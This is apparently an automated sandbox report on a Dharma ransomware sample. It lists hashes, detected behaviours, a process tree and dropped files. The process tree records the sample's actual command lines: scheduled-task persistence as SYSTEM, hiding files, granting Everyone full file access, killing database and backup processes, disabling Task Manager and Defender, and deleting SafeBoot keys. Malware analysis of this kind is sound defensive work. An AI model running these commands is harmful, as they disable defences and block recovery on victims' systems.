Analysis
-
max time kernel
198s -
max time network
34s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
-
submitted
07-05-2023 03:21
General
-
Target
VirusShare_5c36e305d926e55ef98d392176890cd2.exe
-
Size
1.0MB
-
MD5
5c36e305d926e55ef98d392176890cd2
-
SHA1
64a15cdf89b6c8b85cba355b6944074614d810fd
-
SHA256
5671112c276673ee5c4630994ac0034927cee2aa05a32ca6950edbc80c56e7e8
-
SHA512
082855fadbe445ab1f582bb7773276c08bded82ecd00ae1651b620aa12e97315d01acea3cfbe99c504d6d74ce1cff471a4993ff8ebb93416df787cefa88baf1b
-
SSDEEP
24576:EoZZV7Uqi5inyhZQDkUzVDZJ2vH53GaJR38:HOqigyDQDZVq52wM
Malware Config
Signatures
-
Dharma
Dharma is a ransomware that uses security software installation to hide malicious activities.
-
Disables Task Manager via registry modification
-
Drops startup file 3 IoCs
-
Modifies file permissions 1 TTPs 1 IoCs
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Kills process with taskkill 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 3 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe"C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe"1⤵
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /RU SYSTEM /RL HIGHEST /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy C:\ProgramData\harma.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"2⤵
- Drops startup file
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy C:\ProgramData\harma.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"3⤵
- Drops startup file
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN hrm /TR "C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe" /RU SYSTEM /RL HIGHEST /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN hrm /TR "C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe" /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN Harma /TR "C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe" /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN Harma /TR "C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe" /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s harma.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s harma.exe3⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\harma.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s C:\ProgramData\harma.exe3⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exeicacls * /grant Everyone:(OI)(CI)F /T /C /Q4⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd.exe /c taskkill /t /f /im sql*3⤵
-
C:\Windows\system32\taskkill.exetaskkill /t /f /im sql*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im veeam*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy HRMPRIV C:\ProgramData\HRMPRIV2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy HRMPUB C:\ProgramData\HRMPUB2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy id.harma C:\ProgramData\id.harma2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy C:\ProgramData\HRMPRIV %userprofile%\Desktop\HRMPRIV2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\FILES ENCRYPTED.txt" "%userprofile%\Desktop\FILES ENCRYPTED.txt"2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F2⤵
-
C:\Windows\system32\reg.exereg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F2⤵
-
C:\Windows\system32\reg.exereg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\HRMPRIVFilesize
2KB
MD598908523112d9d96bd2505f9b271b312
SHA1766e63727220c64e1fe47c62714c9539dea2d844
SHA2565970ab5a34488aef8b47d2908298abef3c4b6c4ee59196ffe866f9013f51a488
SHA51237168b49fe8c6a49c2e144e0a8e50a18b4c3ce9da2836c90ca79163ebf2a2ba46e5b799e16d890078ac0a7f45fe4d401aa7ae4cccd847204c8888fb5b456e10e
-
C:\ProgramData\HRMPRIVFilesize
2KB
MD598908523112d9d96bd2505f9b271b312
SHA1766e63727220c64e1fe47c62714c9539dea2d844
SHA2565970ab5a34488aef8b47d2908298abef3c4b6c4ee59196ffe866f9013f51a488
SHA51237168b49fe8c6a49c2e144e0a8e50a18b4c3ce9da2836c90ca79163ebf2a2ba46e5b799e16d890078ac0a7f45fe4d401aa7ae4cccd847204c8888fb5b456e10e
-
C:\ProgramData\HRMPRIVFilesize
2KB
MD598908523112d9d96bd2505f9b271b312
SHA1766e63727220c64e1fe47c62714c9539dea2d844
SHA2565970ab5a34488aef8b47d2908298abef3c4b6c4ee59196ffe866f9013f51a488
SHA51237168b49fe8c6a49c2e144e0a8e50a18b4c3ce9da2836c90ca79163ebf2a2ba46e5b799e16d890078ac0a7f45fe4d401aa7ae4cccd847204c8888fb5b456e10e
-
C:\ProgramData\HRMPUBFilesize
292B
MD5c99815322ba0af6cbfd543820feec69c
SHA1df0af0b72e1bfae989253b5f0c2ca33e5068e13f
SHA2569ff98870a23dad6470247a8d367d19bbbac536eadb14e1506ab06bb26500d647
SHA512f267131fc512e29738858c1b5dbffa49587efc2246a329217de7dc2a1870a3975e0588407e68ac7bc62b915fb52b31f7829540db3d352b2fdea90b21ae1fd71e
-
C:\ProgramData\HRMPUBFilesize
292B
MD5c99815322ba0af6cbfd543820feec69c
SHA1df0af0b72e1bfae989253b5f0c2ca33e5068e13f
SHA2569ff98870a23dad6470247a8d367d19bbbac536eadb14e1506ab06bb26500d647
SHA512f267131fc512e29738858c1b5dbffa49587efc2246a329217de7dc2a1870a3975e0588407e68ac7bc62b915fb52b31f7829540db3d352b2fdea90b21ae1fd71e
-
C:\ProgramData\HRMPUBFilesize
292B
MD5c99815322ba0af6cbfd543820feec69c
SHA1df0af0b72e1bfae989253b5f0c2ca33e5068e13f
SHA2569ff98870a23dad6470247a8d367d19bbbac536eadb14e1506ab06bb26500d647
SHA512f267131fc512e29738858c1b5dbffa49587efc2246a329217de7dc2a1870a3975e0588407e68ac7bc62b915fb52b31f7829540db3d352b2fdea90b21ae1fd71e
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\harma.exeFilesize
1.0MB
MD55c36e305d926e55ef98d392176890cd2
SHA164a15cdf89b6c8b85cba355b6944074614d810fd
SHA2565671112c276673ee5c4630994ac0034927cee2aa05a32ca6950edbc80c56e7e8
SHA512082855fadbe445ab1f582bb7773276c08bded82ecd00ae1651b620aa12e97315d01acea3cfbe99c504d6d74ce1cff471a4993ff8ebb93416df787cefa88baf1b
-
C:\ProgramData\harma.exeFilesize
1.0MB
MD55c36e305d926e55ef98d392176890cd2
SHA164a15cdf89b6c8b85cba355b6944074614d810fd
SHA2565671112c276673ee5c4630994ac0034927cee2aa05a32ca6950edbc80c56e7e8
SHA512082855fadbe445ab1f582bb7773276c08bded82ecd00ae1651b620aa12e97315d01acea3cfbe99c504d6d74ce1cff471a4993ff8ebb93416df787cefa88baf1b
-
C:\ProgramData\id.harmaFilesize
8B
MD5e2997224818aa8c8f4ea04513a210031
SHA11e9e1b8c32d9ac412d2512199fff5b6cef7fe113
SHA256a16927d9b026dbfa0658cfacd90e5ebd2444484e931945c5e3562a6c01c95214
SHA51296c86a59b2bd8ddb8be2296142f5a33a88ced9d43e7e76d5c217cacb89cda5bc3daea52bee156dccfb6a319632218f060b551da7c30bc3fdea018c6b2bc4bc4b
-
C:\Users\Admin\AppData\Local\Temp\HRMPRIVFilesize
2KB
MD598908523112d9d96bd2505f9b271b312
SHA1766e63727220c64e1fe47c62714c9539dea2d844
SHA2565970ab5a34488aef8b47d2908298abef3c4b6c4ee59196ffe866f9013f51a488
SHA51237168b49fe8c6a49c2e144e0a8e50a18b4c3ce9da2836c90ca79163ebf2a2ba46e5b799e16d890078ac0a7f45fe4d401aa7ae4cccd847204c8888fb5b456e10e
-
C:\Users\Admin\AppData\Local\Temp\HRMPUBFilesize
292B
MD5c99815322ba0af6cbfd543820feec69c
SHA1df0af0b72e1bfae989253b5f0c2ca33e5068e13f
SHA2569ff98870a23dad6470247a8d367d19bbbac536eadb14e1506ab06bb26500d647
SHA512f267131fc512e29738858c1b5dbffa49587efc2246a329217de7dc2a1870a3975e0588407e68ac7bc62b915fb52b31f7829540db3d352b2fdea90b21ae1fd71e
-
C:\Users\Admin\AppData\Local\Temp\id.harmaFilesize
8B
MD5e2997224818aa8c8f4ea04513a210031
SHA11e9e1b8c32d9ac412d2512199fff5b6cef7fe113
SHA256a16927d9b026dbfa0658cfacd90e5ebd2444484e931945c5e3562a6c01c95214
SHA51296c86a59b2bd8ddb8be2296142f5a33a88ced9d43e7e76d5c217cacb89cda5bc3daea52bee156dccfb6a319632218f060b551da7c30bc3fdea018c6b2bc4bc4b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exeFilesize
1.0MB
MD55c36e305d926e55ef98d392176890cd2
SHA164a15cdf89b6c8b85cba355b6944074614d810fd
SHA2565671112c276673ee5c4630994ac0034927cee2aa05a32ca6950edbc80c56e7e8
SHA512082855fadbe445ab1f582bb7773276c08bded82ecd00ae1651b620aa12e97315d01acea3cfbe99c504d6d74ce1cff471a4993ff8ebb93416df787cefa88baf1b